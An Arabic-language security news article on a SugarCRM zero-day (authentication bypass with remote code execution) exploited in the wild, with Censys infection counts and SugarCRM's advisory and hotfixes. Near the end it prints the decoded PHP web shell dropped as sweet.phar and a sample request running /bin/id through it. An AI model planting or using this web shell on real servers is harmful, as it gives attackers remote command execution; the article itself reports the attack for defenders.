على مدار الأسبوعين الماضيين ، كان المتسللون يستغلون ثغرة خطيرة في نظام SugarCRM (إدارة علاقات العملاء) لإصابة المستخدمين ببرامج ضارة تمنحهم السيطرة الكاملة على خوادمهم.
بدأت الثغرة ليوم الصفر عندما تم نشر كود الاستغلال على الإنترنت في أواخر ديسمبر. وصفه الشخص الذي ينشر الاستغلال بأنه تجاوز للمصادقة مع تنفيذ التعليمات البرمجية عن بُعد ، مما يعني أن المهاجم يمكنه استخدامه لتشغيل تعليمات برمجية ضارة على خوادم ضعيفة دون الحاجة إلى بيانات اعتماد. نشرت SugarCRM منذ ذلك الحين تقريرًا استشاريًا يؤكد هذا الوصف. تضمنت عملية الاستغلال أيضًا العديد من “dorks” ، وهي عمليات بحث بسيطة على الويب يمكن للأشخاص القيام بها لتحديد مواقع الخوادم المعرضة للخطر على الإنترنت.
قال مارك إلزي ، كبير الباحثين الأمنيين في خدمة مراقبة الشبكات Censys ، في رسالة بريد إلكتروني ، إنه اعتبارًا من 11 يناير ، اكتشفت الشركة 354 خوادم SugarCRM مصابة باستخدام الصفر يوم. هذا ما يقرب من 12 في المائة من إجمالي 3059 خوادم SugarCRM التي اكتشفها Censys. اعتبارًا من الأسبوع الماضي ، كانت الإصابات أعلى في الولايات المتحدة ، مع 90 ، تليها ألمانيا وأستراليا وفرنسا. في تحديث يوم الثلاثاء ، قال Censys إن عدد الإصابات لم يرتفع كثيرًا منذ المنشور الأصلي.
أتاحت إرشادات SugarCRM ، التي نُشرت في 5 يناير ، الإصلاحات العاجلة ، وقالت إنه تم تطبيقها بالفعل على خدمتها المستندة إلى السحابة. كما نصح المستخدمين الذين لديهم مثيلات تعمل خارج استضافة SugarCloud أو SugarCRM المُدارة لتثبيت الإصلاحات العاجلة. قال الاستشاري أن الثغرة أثرت على حلول برامج Sugar Sell و Serve و Enterprise و Professional و Ultimate. لم يؤثر ذلك على برنامج Sugar Market.
قال Censys إن تجاوز المصادقة يعمل ضد /index.php/ الدليل. “بعد نجاح تجاوز المصادقة ، يتم الحصول على ملف تعريف ارتباط من الخدمة ، ويتم إرسال طلب POST ثانوي إلى المسار” /cache/images/sweet.phar “الذي يحمل ملفًا صغيرًا مشفرًا بتنسيق PNG يحتوي على كود PHP الذي سيكون يتم تنفيذه بواسطة الخادم عند تقديم طلب آخر للملف “، أضاف باحثو الشركة.
عندما يتم تحليل الملف الثنائي باستخدام برنامج hexdump وفك تشفيره ، يترجم كود PHP تقريبًا إلى:
〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉
“هذه قذيفة ويب بسيطة ستنفذ الأوامر بناءً على قيمة وسيطة الاستعلام المشفرة بـ base64 لـ” c “(على سبيل المثال ،” POST /cache/images/sweet.phar؟c=”L2Jpbi9pZA== “HTTP / 1.1” ، الذي سينفذ الأمر “/ bin / id” بنفس الأذونات مثل معرف المستخدم الذي يقوم بتشغيل خدمة الويب) ، أوضح المنشور.
توفر قذيفة الويب نافذة قائمة على النص يمكن للمهاجمين استخدامها كواجهة لتشغيل الأوامر أو التعليمات البرمجية التي يختارونها على الأجهزة المخترقة. قال Ellzey من Censys إن الشركة لم يكن لديها رؤية دقيقة لما يستخدم المهاجمون القذائف من أجله.
توفر كل من تحذيرات Censys و SugarCRM مؤشرات للتسوية التي يمكن لعملاء SugarCRM استخدامها لتحديد ما إذا كان قد تم استهدافهم. يجب على مستخدمي المنتجات المعرضة للهجوم التحقيق في الإصلاحات العاجلة وتثبيتها في أسرع وقت ممكن.
